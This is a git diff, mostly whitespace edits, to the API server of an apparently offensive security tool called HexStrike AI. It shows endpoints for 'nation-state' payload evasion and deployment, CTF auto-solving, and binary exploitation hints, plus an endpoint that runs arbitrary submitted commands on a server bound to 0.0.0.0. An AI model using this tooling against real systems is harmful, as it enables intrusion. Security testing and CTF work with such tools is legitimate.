if evasion_level == "nation-state": # Nation-state level techniques advanced_techniques = [ @@ -14171,7 +14181,7 @@ def advanced_payload_generation(): } ] enhanced_payload["evasion_techniques"].extend(advanced_techniques) - + # Deployment methods enhanced_payload["deployment_methods"] = [ "Direct injection", @@ -14180,9 +14190,9 @@ def advanced_payload_generation(): "Cookie manipulation", "Fragment-based delivery" ] - + advanced_payloads.append(enhanced_payload) - + # Generate deployment instructions deployment_guide = { "pre_deployment": [ @@ -14204,7 +14214,7 @@ def advanced_payload_generation(): "Report vulnerabilities responsibly" ] } - + result = { "success": True, "advanced_payload_generation": { @@ -14219,10 +14229,10 @@ def advanced_payload_generation(): "disclaimer": "These payloads are for authorized security testing only. Ensure proper authorization before use.", "timestamp": datetime.now().isoformat() } - + logger.info(f"๐ŸŽฏ Advanced payload generation completed | Generated: {len(advanced_payloads)} payloads") return jsonify(result) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in advanced payload generation: {str(e)}") return jsonify({ @@ -14245,10 +14255,10 @@ def create_ctf_challenge_workflow(): points = params.get("points", 100) description = params.get("description", "") target = params.get("target", "") - + if not challenge_name: return jsonify({"error": "Challenge name is required"}), 400 - + # Create CTF challenge object challenge = CTFChallenge( name=challenge_name, @@ -14258,10 +14268,10 @@ def create_ctf_challenge_workflow(): description=description, target=target ) - + # Generate workflow workflow = ctf_manager.create_ctf_challenge_workflow(challenge) - + logger.info(f"๐ŸŽฏ CTF workflow created for {challenge_name} | Category: {category} | Difficulty: {difficulty}") return jsonify({ "success": True, @@ -14269,7 +14279,7 @@ def create_ctf_challenge_workflow(): "challenge": challenge.to_dict(), "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error creating CTF workflow: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14285,10 +14295,10 @@ def auto_solve_ctf_challenge(): points = params.get("points", 100) description = params.get("description", "") target = params.get("target", "") - + if not challenge_name: return jsonify({"error": "Challenge name is required"}), 400 - + # Create CTF challenge object challenge = CTFChallenge( name=challenge_name, @@ -14298,10 +14308,10 @@ def auto_solve_ctf_challenge(): description=description, target=target ) - + # Attempt automated solving result = ctf_automator.auto_solve_challenge(challenge) - + logger.info(f"๐Ÿค– CTF auto-solve attempted for {challenge_name} | Status: {result['status']}") return jsonify({ "success": True, @@ -14309,7 +14319,7 @@ def auto_solve_ctf_challenge(): "challenge": challenge.to_dict(), "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in CTF auto-solve: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14321,10 +14331,10 @@ def create_ctf_team_strategy(): params = request.json challenges_data = params.get("challenges", []) team_skills = params.get("team_skills", {}) - + if not challenges_data: return jsonify({"error": "Challenges data is required"}), 400 - + # Convert challenge data to CTFChallenge objects challenges = [] for challenge_data in challenges_data: @@ -14337,10 +14347,10 @@ def create_ctf_team_strategy(): target=challenge_data.get("target", "") ) challenges.append(challenge) - + # Generate team strategy strategy = ctf_coordinator.optimize_team_strategy(challenges, team_skills) - + logger.info(f"๐Ÿ‘ฅ CTF team strategy created | Challenges: {len(challenges)} | Team members: {len(team_skills)}") return jsonify({ "success": True, @@ -14349,7 +14359,7 @@ def create_ctf_team_strategy(): "team_size": len(team_skills), "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error creating CTF team strategy: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14361,14 +14371,14 @@ def suggest_ctf_tools(): params = request.json description = params.get("description", "") category = params.get("category", "misc") - + if not description: return jsonify({"error": "Challenge description is required"}), 400 - + # Get tool suggestions suggested_tools = ctf_tools.suggest_tools_for_challenge(description, category) category_tools = ctf_tools.get_category_tools(f"{category}_recon") - + # Get tool commands tool_commands = {} for tool in suggested_tools: @@ -14376,7 +14386,7 @@ def suggest_ctf_tools(): tool_commands[tool] = ctf_tools.get_tool_command(tool, "TARGET") except: tool_commands[tool] = f"{tool} TARGET" - + logger.info(f"๐Ÿ”ง CTF tools suggested | Category: {category} | Tools: {len(suggested_tools)}") return jsonify({ "success": True, @@ -14386,7 +14396,7 @@ def suggest_ctf_tools(): "category": category, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error suggesting CTF tools: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14401,10 +14411,10 @@ def ctf_cryptography_solver(): key_hint = params.get("key_hint", "") known_plaintext = params.get("known_plaintext", "") additional_info = params.get("additional_info", "") - + if not cipher_text: return jsonify({"error": "Cipher text is required"}), 400 - + results = { "cipher_text": cipher_text, "cipher_type": cipher_type, @@ -14413,53 +14423,53 @@ def ctf_cryptography_solver(): "recommended_tools": [], "next_steps": [] } - + # Cipher type identification if cipher_type == "unknown": # Basic cipher identification heuristics if re.match(r'^[0-9a-fA-F]+$', cipher_text.replace(' ', '')): results["analysis_results"].append("Possible hexadecimal encoding") results["recommended_tools"].extend(["hex", "xxd"]) - + if re.match(r'^[A-Za-z0-9+/]+=*$', cipher_text.replace(' ', '')): results["analysis_results"].append("Possible Base64 encoding") results["recommended_tools"].append("base64") - + if len(set(cipher_text.upper().replace(' ', ''))) <= 26: results["analysis_results"].append("Possible substitution cipher") results["recommended_tools"].extend(["frequency-analysis", "substitution-solver"]) - + # Hash identification hash_patterns = { 32: "MD5", - 40: "SHA1", + 40: "SHA1", 64: "SHA256", 128: "SHA512" } - + clean_text = cipher_text.replace(' ', '').replace('\n', '') if len(clean_text) in hash_patterns and re.match(r'^[0-9a-fA-F]+$', clean_text): hash_type = hash_patterns[len(clean_text)] results["analysis_results"].append(f"Possible {hash_type} hash") results["recommended_tools"].extend(["hashcat", "john", "hash-identifier"]) - + # Frequency analysis for substitution ciphers if cipher_type in ["substitution", "caesar", "vigenere"] or "substitution" in results["analysis_results"]: char_freq = {} for char in cipher_text.upper(): if char.isalpha(): char_freq[char] = char_freq.get(char, 0) + 1 - + if char_freq: most_common = max(char_freq, key=char_freq.get) results["analysis_results"].append(f"Most frequent character: {most_common} ({char_freq[most_common]} occurrences)") results["next_steps"].append("Try substituting most frequent character with 'E'") - + # ROT/Caesar cipher detection if cipher_type == "caesar" or len(set(cipher_text.upper().replace(' ', ''))) <= 26: results["recommended_tools"].append("rot13") results["next_steps"].append("Try all ROT values (1-25)") - + # RSA-specific analysis if cipher_type == "rsa" or "rsa" in additional_info.lower(): results["recommended_tools"].extend(["rsatool", "factordb", "yafu"]) @@ -14468,7 +14478,7 @@ def ctf_cryptography_solver(): "Look for small public exponent attacks", "Check for common modulus attacks" ]) - + # Vigenรจre cipher analysis if cipher_type == "vigenere" or "vigenere" in additional_info.lower(): results["recommended_tools"].append("vigenere-solver") @@ -14477,14 +14487,14 @@ def ctf_cryptography_solver(): "Use index of coincidence analysis", "Try common key words" ]) - + logger.info(f"๐Ÿ” CTF crypto analysis completed | Type: {cipher_type} | Tools: {len(results['recommended_tools'])}") return jsonify({ "success": True, "analysis": results, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in CTF crypto solver: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14498,10 +14508,10 @@ def ctf_forensics_analyzer(): analysis_type = params.get("analysis_type", "comprehensive") extract_hidden = params.get("extract_hidden", True) check_steganography = params.get("check_steganography", True) - + if not file_path: return jsonify({"error": "File path is required"}), 400 - + results = { "file_path": file_path, "analysis_type": analysis_type, @@ -14512,14 +14522,14 @@ def ctf_forensics_analyzer(): "recommended_tools": [], "next_steps": [] } - + # Basic file analysis try: # File command file_result = subprocess.run(['file', file_path], capture_output=True, text=True, timeout=30) if file_result.returncode == 0: results["file_info"]["type"] = file_result.stdout.strip() - + # Determine file category and suggest tools file_type = file_result.stdout.lower() if "image" in file_type: @@ -14552,7 +14562,7 @@ def ctf_forensics_analyzer(): ]) except Exception as e: results["file_info"]["error"] = str(e) - + # Metadata extraction try: exif_result = subprocess.run(['exiftool', file_path], capture_output=True, text=True, timeout=30) @@ -14560,7 +14570,7 @@ def ctf_forensics_analyzer(): results["metadata"]["exif"] = exif_result.stdout except Exception as e: results["metadata"]["exif_error"] = str(e) - + # Binwalk analysis for hidden files if extract_hidden: try: @@ -14575,7 +14585,7 @@ def ctf_forensics_analyzer(): "tool": "binwalk", "error": str(e) }) - + # Steganography checks if check_steganography: # Check for common steganography tools @@ -14588,7 +14598,7 @@ def ctf_forensics_analyzer(): steg_result = subprocess.run([tool, '-a', file_path], capture_output=True, text=True, timeout=30) elif tool == "outguess": steg_result = subprocess.run([tool, '-r', file_path, '/tmp/outguess_output'], capture_output=True, text=True, timeout=30) - + if steg_result.returncode == 0 and steg_result.stdout.strip(): results["steganography_results"].append({ "tool": tool, @@ -14599,7 +14609,7 @@ def ctf_forensics_analyzer(): "tool": tool, "error": str(e) }) - + # Strings analysis try: strings_result = subprocess.run(['strings', file_path], capture_output=True, text=True, timeout=30) @@ -14609,7 +14619,7 @@ def ctf_forensics_analyzer(): for line in strings_result.stdout.split('\n'): if any(keyword in line.lower() for keyword in ['flag', 'password', 'key', 'secret', 'http', 'ftp']): interesting_strings.append(line.strip()) - + if interesting_strings: results["hidden_data"].append({ "tool": "strings", @@ -14620,14 +14630,14 @@ def ctf_forensics_analyzer(): "tool": "strings", "error": str(e) }) - + logger.info(f"๐Ÿ” CTF forensics analysis completed | File: {file_path} | Tools used: {len(results['recommended_tools'])}") return jsonify({ "success": True, "analysis": results, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in CTF forensics analyzer: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14641,10 +14651,10 @@ def ctf_binary_analyzer(): analysis_depth = params.get("analysis_depth", "comprehensive") # basic, comprehensive, deep check_protections = params.get("check_protections", True) find_gadgets = params.get("find_gadgets", True) - + if not binary_path: return jsonify({"error": "Binary path is required"}), 400 - + results = { "binary_path": binary_path, "analysis_depth": analysis_depth, @@ -14656,13 +14666,13 @@ def ctf_binary_analyzer(): "recommended_tools": [], "exploitation_hints": [] } - + # Basic file information try: file_result = subprocess.run(['file', binary_path], capture_output=True, text=True, timeout=30) if file_result.returncode == 0: results["file_info"]["type"] = file_result.stdout.strip() - + # Determine architecture and suggest tools file_output = file_result.stdout.lower() if "x86-64" in file_output or "x86_64" in file_output: @@ -14671,18 +14681,18 @@ def ctf_binary_analyzer(): results["file_info"]["architecture"] = "i386" elif "arm" in file_output: results["file_info"]["architecture"] = "ARM" - + results["recommended_tools"].extend(["gdb-peda", "radare2", "ghidra"]) except Exception as e: results["file_info"]["error"] = str(e) - + # Security protections check if check_protections: try: checksec_result = subprocess.run(['checksec', '--file', binary_path], capture_output=True, text=True, timeout=30) if checksec_result.returncode == 0: results["security_protections"]["checksec"] = checksec_result.stdout - + # Parse protections and provide exploitation hints output = checksec_result.stdout.lower() if "no canary found" in output: @@ -14695,13 +14705,13 @@ def ctf_binary_analyzer(): results["exploitation_hints"].append("RELRO disabled - GOT overwrite attacks possible") except Exception as e: results["security_protections"]["error"] = str(e) - + # Strings analysis try: strings_result = subprocess.run(['strings', binary_path], capture_output=True, text=True, timeout=30) if strings_result.returncode == 0: strings_output = strings_result.stdout.split('\n') - + # Categorize interesting strings interesting_categories = { "functions": [], @@ -14710,48 +14720,48 @@ def ctf_binary_analyzer(): "potential_flags": [], "system_calls": [] } - + for string in strings_output: string = string.strip() if not string: continue - + # Look for function names if any(func in string for func in ['printf', 'scanf', 'gets', 'strcpy', 'system', 'execve']): interesting_categories["functions"].append(string) - + # Look for format strings if '%' in string and any(fmt in string for fmt in ['%s', '%d', '%x', '%n']): interesting_categories["format_strings"].append(string) - + # Look for file paths if string.startswith('/') or '\\' in string: interesting_categories["file_paths"].append(string) - + # Look for potential flags if any(keyword in string.lower() for keyword in ['flag', 'ctf', 'key', 'password']): interesting_categories["potential_flags"].append(string) - + # Look for system calls if string in ['sh', 'bash', '/bin/sh', '/bin/bash', 'cmd.exe']: interesting_categories["system_calls"].append(string) - + results["strings_analysis"] = interesting_categories - + # Add exploitation hints based on strings if interesting_categories["functions"]: dangerous_funcs = ['gets', 'strcpy', 'sprintf', 'scanf'] found_dangerous = [f for f in dangerous_funcs if any(f in s for s in interesting_categories["functions"])] if found_dangerous: results["exploitation_hints"].append(f"Dangerous functions found: {', '.join(found_dangerous)} - potential buffer overflow") - + if interesting_categories["format_strings"]: if any('%n' in s for s in interesting_categories["format_strings"]): results["exploitation_hints"].append("Format string with %n found - potential format string vulnerability") - + except Exception as e: results["strings_analysis"]["error"] = str(e) - + # ROP gadgets search if find_gadgets and analysis_depth in ["comprehensive", "deep"]: try: @@ -14759,20 +14769,20 @@ def ctf_binary_analyzer(): if ropgadget_result.returncode == 0: gadget_lines = ropgadget_result.stdout.split('\n') useful_gadgets = [] - + for line in gadget_lines: if 'pop' in line and 'ret' in line: useful_gadgets.append(line.strip()) - + results["gadgets"] = useful_gadgets[:20] # Limit to first 20 gadgets - + if useful_gadgets: results["exploitation_hints"].append(f"Found {len(useful_gadgets)} ROP gadgets - ROP chain exploitation possible") results["recommended_tools"].append("ropper") - + except Exception as e: results["gadgets"] = [f"Error finding gadgets: {str(e)}"] - + # Function analysis with objdump if analysis_depth in ["comprehensive", "deep"]: try: @@ -14785,25 +14795,25 @@ def ctf_binary_analyzer(): if len(parts) >= 6: func_name = parts[-1] functions.append(func_name) - + results["interesting_functions"] = functions[:50] # Limit to first 50 functions except Exception as e: results["interesting_functions"] = [f"Error analyzing functions: {str(e)}"] - + # Add tool recommendations based on findings if results["exploitation_hints"]: results["recommended_tools"].extend(["pwntools", "gdb-peda", "one-gadget"]) - + if "format string" in str(results["exploitation_hints"]).lower(): results["recommended_tools"].append("format-string-exploiter") - + logger.info(f"๐Ÿ”ฌ CTF binary analysis completed | Binary: {binary_path} | Hints: {len(results['exploitation_hints'])}") return jsonify({ "success": True, "analysis": results, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in CTF binary analyzer: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14819,13 +14829,13 @@ def execute_command_async(): params = request.json command = params.get("command", "") context = params.get("context", {}) - + if not command: return jsonify({"error": "Command parameter is required"}), 400 - + # Execute command asynchronously task_id = enhanced_process_manager.execute_command_async(command, context) - + logger.info(f"๐Ÿš€ Async command execution started | Task ID: {task_id}") return jsonify({ "success": True, @@ -14834,7 +14844,7 @@ def execute_command_async(): "status": "submitted", "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in async command execution: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14844,10 +14854,10 @@ def get_async_task_result(task_id): """Get result of asynchronous task""" try: result = enhanced_process_manager.get_task_result(task_id) - + if result["status"] == "not_found": return jsonify({"error": "Task not found"}), 404 - + logger.info(f"๐Ÿ“‹ Task result retrieved | Task ID: {task_id} | Status: {result['status']}") return jsonify({ "success": True, @@ -14855,7 +14865,7 @@ def get_async_task_result(task_id): "result": result, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error getting task result: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14865,14 +14875,14 @@ def get_process_pool_stats(): """Get process pool statistics and performance metrics""" try: stats = enhanced_process_manager.get_comprehensive_stats() - + logger.info(f"๐Ÿ“Š Process pool stats retrieved | Active workers: {stats['process_pool']['active_workers']}") return jsonify({ "success": True, "stats": stats, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error getting pool stats: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14882,14 +14892,14 @@ def get_cache_stats(): """Get advanced cache statistics""" try: cache_stats = enhanced_process_manager.cache.get_stats() - + logger.info(f"๐Ÿ’พ Cache stats retrieved | Hit rate: {cache_stats['hit_rate']:.1f}%") return jsonify({ "success": True, "cache_stats": cache_stats, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error getting cache stats: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14899,14 +14909,14 @@ def clear_process_cache(): """Clear the advanced cache""" try: enhanced_process_manager.cache.clear() - + logger.info("๐Ÿงน Process cache cleared") return jsonify({ "success": True, "message": "Cache cleared successfully", "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error clearing cache: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14917,7 +14927,7 @@ def get_resource_usage(): try: current_usage = enhanced_process_manager.resource_monitor.get_current_usage() usage_trends = enhanced_process_manager.resource_monitor.get_usage_trends() - + logger.info(f"๐Ÿ“ˆ Resource usage retrieved | CPU: {current_usage['cpu_percent']:.1f}% | Memory: {current_usage['memory_percent']:.1f}%") return jsonify({ "success": True, @@ -14925,7 +14935,7 @@ def get_resource_usage(): "usage_trends": usage_trends, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error getting resource usage: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14937,7 +14947,7 @@ def get_performance_dashboard(): dashboard_data = enhanced_process_manager.performance_dashboard.get_summary() pool_stats = enhanced_process_manager.process_pool.get_pool_stats() resource_usage = enhanced_process_manager.resource_monitor.get_current_usage() - + # Create comprehensive dashboard dashboard = { "performance_summary": dashboard_data, @@ -14951,14 +14961,14 @@ def get_performance_dashboard(): "disk_status": "healthy" if resource_usage["disk_percent"] < 90 else "warning" if resource_usage["disk_percent"] < 98 else "critical" } } - + logger.info(f"๐Ÿ“Š Performance dashboard retrieved | Success rate: {dashboard_data.get('success_rate', 0):.1f}%") return jsonify({ "success": True, "dashboard": dashboard, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error getting performance dashboard: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14969,9 +14979,9 @@ def terminate_process_gracefully(pid): try: params = request.json or {} timeout = params.get("timeout", 30) - + success = enhanced_process_manager.terminate_process_gracefully(pid, timeout) - + if success: logger.info(f"โœ… Process {pid} terminated gracefully") return jsonify({ @@ -14987,7 +14997,7 @@ def terminate_process_gracefully(pid): "pid": pid, "timestamp": datetime.now().isoformat() }), 400 - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error terminating process {pid}: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -14999,13 +15009,13 @@ def configure_auto_scaling(): params = request.json enabled = params.get("enabled", True) thresholds = params.get("thresholds", {}) - + # Update auto-scaling configuration enhanced_process_manager.auto_scaling_enabled = enabled - + if thresholds: enhanced_process_manager.resource_thresholds.update(thresholds) - + logger.info(f"โš™๏ธ Auto-scaling configured | Enabled: {enabled}") return jsonify({ "success": True, @@ -15013,7 +15023,7 @@ def configure_auto_scaling(): "resource_thresholds": enhanced_process_manager.resource_thresholds, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error configuring auto-scaling: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -15025,13 +15035,13 @@ def manual_scale_pool(): params = request.json action = params.get("action", "") # "up" or "down" count = params.get("count", 1) - + if action not in ["up", "down"]: return jsonify({"error": "Action must be 'up' or 'down'"}), 400 - + current_stats = enhanced_process_manager.process_pool.get_pool_stats() current_workers = current_stats["active_workers"] - + if action == "up": max_workers = enhanced_process_manager.process_pool.max_workers if current_workers + count <= max_workers: @@ -15048,7 +15058,7 @@ def manual_scale_pool(): message = f"Scaled down by {count} workers" else: return jsonify({"error": f"Cannot scale down: would go below min workers ({min_workers})"}), 400 - + logger.info(f"๐Ÿ“ Manual scaling | {message} | Workers: {current_workers} โ†’ {new_workers}") return jsonify({ "success": True, @@ -15057,7 +15067,7 @@ def manual_scale_pool(): "current_workers": new_workers, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error scaling pool: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -15068,15 +15078,15 @@ def process_health_check(): try: # Get all system stats comprehensive_stats = enhanced_process_manager.get_comprehensive_stats() - + # Determine overall health resource_usage = comprehensive_stats["resource_usage"] pool_stats = comprehensive_stats["process_pool"] cache_stats = comprehensive_stats["cache"] - + health_score = 100 issues = [] - + # CPU health if resource_usage["cpu_percent"] > 95: health_score -= 30 @@ -15084,7 +15094,7 @@ def process_health_check(): elif resource_usage["cpu_percent"] > 80: health_score -= 15 issues.append("High CPU usage") - + # Memory health if resource_usage["memory_percent"] > 95: health_score -= 25 @@ -15092,7 +15102,7 @@ def process_health_check(): elif resource_usage["memory_percent"] > 85: health_score -= 10 issues.append("High memory usage") - + # Disk health if resource_usage["disk_percent"] > 98: health_score -= 20 @@ -15100,19 +15110,19 @@ def process_health_check(): elif resource_usage["disk_percent"] > 90: health_score -= 5 issues.append("High disk usage") - + # Process pool health if pool_stats["queue_size"] > 50: health_score -= 15 issues.append("High task queue backlog") - + # Cache health if cache_stats["hit_rate"] < 30: health_score -= 10 issues.append("Low cache hit rate") - + health_score = max(0, health_score) - + # Determine status if health_score >= 90: status = "excellent" @@ -15124,7 +15134,7 @@ def process_health_check(): status = "poor" else: status = "critical" - + health_report = { "overall_status": status, "health_score": health_score, @@ -15132,7 +15142,7 @@ def process_health_check(): "system_stats": comprehensive_stats, "recommendations": [] } - + # Add recommendations based on issues if "High CPU usage" in issues: health_report["recommendations"].append("Consider reducing concurrent processes or upgrading CPU") @@ -15142,14 +15152,14 @@ def process_health_check(): health_report["recommendations"].append("Scale up process pool or optimize task processing") if "Low cache hit rate" in issues: health_report["recommendations"].append("Review cache TTL settings or increase cache size") - + logger.info(f"๐Ÿฅ Health check completed | Status: {status} | Score: {health_score}/100") return jsonify({ "success": True, "health_report": health_report, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"๐Ÿ’ฅ Error in health check: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -15184,7 +15194,7 @@ def test_error_recovery(): tool_name = data.get("tool_name", "nmap") error_type = data.get("error_type", "timeout") target = data.get("target", "example.com") - + # Simulate an error for testing if error_type == "timeout": exception = TimeoutError("Simulated timeout error") @@ -15194,16 +15204,16 @@ def test_error_recovery(): exception = ConnectionError("Simulated network error") else: exception = Exception(f"Simulated {error_type} error") - + context = { "target": target, "parameters": data.get("parameters", {}), "attempt_count": 1 } - + # Get recovery strategy recovery_strategy = error_handler.handle_tool_failure(tool_name, exception, context) - + return jsonify({ "success": True, "recovery_strategy": { @@ -15217,7 +15227,7 @@ def test_error_recovery(): "alternative_tools": error_handler.tool_alternatives.get(tool_name, []), "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"Error testing recovery system: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -15228,7 +15238,7 @@ def get_fallback_chains(): try: operation = request.args.get("operation", "") failed_tools = request.args.getlist("failed_tools") - + if operation: fallback_chain = degradation_manager.create_fallback_chain(operation, failed_tools) return jsonify({ @@ -15245,7 +15255,7 @@ def get_fallback_chains(): "critical_operations": list(degradation_manager.critical_operations), "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"Error getting fallback chains: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -15260,10 +15270,10 @@ def execute_with_recovery_endpoint(): parameters = data.get("parameters", {}) max_attempts = data.get("max_attempts", 3) use_cache = data.get("use_cache", True) - + if not tool_name or not command: return jsonify({"error": "tool_name and command are required"}), 400 - + # Execute command with recovery result = execute_command_with_recovery( tool_name=tool_name, @@ -15272,13 +15282,13 @@ def execute_with_recovery_endpoint(): use_cache=use_cache, max_attempts=max_attempts ) - + return jsonify({ "success": result.get("success", False), "result": result, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"Error executing command with recovery: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -15289,13 +15299,13 @@ def classify_error_endpoint(): try: data = request.get_json() error_message = data.get("error_message", "") - + if not error_message: return jsonify({"error": "error_message is required"}), 400 - + error_type = error_handler.classify_error(error_message) recovery_strategies = error_handler.recovery_strategies.get(error_type, []) - + return jsonify({ "success": True, "error_type": error_type.value, @@ -15310,7 +15320,7 @@ def classify_error_endpoint(): ], "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"Error classifying error: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -15323,18 +15333,18 @@ def get_parameter_adjustments(): tool_name = data.get("tool_name", "") error_type_str = data.get("error_type", "") original_params = data.get("original_params", {}) - + if not tool_name or not error_type_str: return jsonify({"error": "tool_name and error_type are required"}), 400 - + # Convert string to ErrorType enum try: error_type = ErrorType(error_type_str) except ValueError: return jsonify({"error": f"Invalid error_type: {error_type_str}"}), 400 - + adjusted_params = error_handler.auto_adjust_parameters(tool_name, error_type, original_params) - + return jsonify({ "success": True, "tool_name": tool_name, @@ -15343,7 +15353,7 @@ def get_parameter_adjustments(): "adjusted_params": adjusted_params, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"Error getting parameter adjustments: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -15353,12 +15363,12 @@ def get_alternative_tools(): """Get alternative tools for a given tool""" try: tool_name = request.args.get("tool_name", "") - + if not tool_name: return jsonify({"error": "tool_name parameter is required"}), 400 - + alternatives = error_handler.tool_alternatives.get(tool_name, []) - + return jsonify({ "success": True, "tool_name": tool_name, @@ -15366,7 +15376,7 @@ def get_alternative_tools(): "has_alternatives": len(alternatives) > 0, "timestamp": datetime.now().isoformat() }) - + except Exception as e: logger.error(f"Error getting alternative tools: {str(e)}") return jsonify({"error": f"Server error: {str(e)}"}), 500 @@ -15377,19 +15387,19 @@ BANNER = ModernVisualEngine.create_banner() if __name__ == "__main__": # Display the beautiful new banner print(BANNER) - + parser = argparse.ArgumentParser(description="Run the HexStrike AI API Server") parser.add_argument("--debug", action="store_true", help="Enable debug mode") parser.add_argument("--port", type=int, default=API_PORT, help=f"Port for the API server (default: {API_PORT})") args = parser.parse_args() - + if args.debug: DEBUG_MODE = True logger.setLevel(logging.DEBUG) - + if args.port != API_PORT: API_PORT = args.port - + # Enhanced startup messages with beautiful formatting startup_info = f""" {ModernVisualEngine.COLORS['MATRIX_GREEN']}{ModernVisualEngine.COLORS['BOLD']}โ•ญโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฎ{ModernVisualEngine.COLORS['RESET']} @@ -15402,9 +15412,9 @@ if __name__ == "__main__": {ModernVisualEngine.COLORS['BOLD']}โ”‚{ModernVisualEngine.COLORS['RESET']} {ModernVisualEngine.COLORS['MATRIX_GREEN']}โœจ Enhanced Visual Engine:{ModernVisualEngine.COLORS['RESET']} Active {ModernVisualEngine.COLORS['MATRIX_GREEN']}{ModernVisualEngine.COLORS['BOLD']}โ•ฐโ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ”€โ•ฏ{ModernVisualEngine.COLORS['RESET']} """ - + for line in startup_info.strip().split('\n'): if line.strip(): logger.info(line) - - app.run(host="0.0.0.0", port=API_PORT, debug=DEBUG_MODE) \ No newline at end of file + + app.run(host="0.0.0.0", port=API_PORT, debug=DEBUG_MODE) diff --git a/requirements.txt b/requirements.txt index 2a2155f..ff4cede 100644 --- a/requirements.txt +++ b/requirements.txt @@ -1,4 +1,4 @@ -# HexStrike AI MCP Agents v6.0 +# HexStrike AI MCP Agents v6.0 # # INSTALLATION COMMANDS: # python3 -m venv hexstrike_env @@ -36,48 +36,49 @@ mitmproxy>=9.0.0,<11.0.0 # HTTP proxy (mitmproxy imports) # ============================================================================ pwntools>=4.10.0,<5.0.0 # Binary exploitation (from pwn import *) angr>=9.2.0,<10.0.0 # Binary analysis (import angr) +bcrypt==4.0.1 # Pin bcrypt version for passlib compatibility (fixes pwntools dependency issue) # ============================================================================ # EXTERNAL SECURITY TOOLS (150+ Tools - Install separately) # ============================================================================ -# +# # HexStrike v6.0 integrates with 150+ external security tools that must be # installed separately from their official sources: -# +# # ๐Ÿ” Network & Reconnaissance (25+ tools): # - nmap, masscan, rustscan, autorecon, amass, subfinder, fierce # - dnsenum, theharvester, responder, netexec, enum4linux-ng -# +# # ๐ŸŒ Web Application Security (40+ tools): # - gobuster, feroxbuster, ffuf, dirb, dirsearch, nuclei, nikto # - 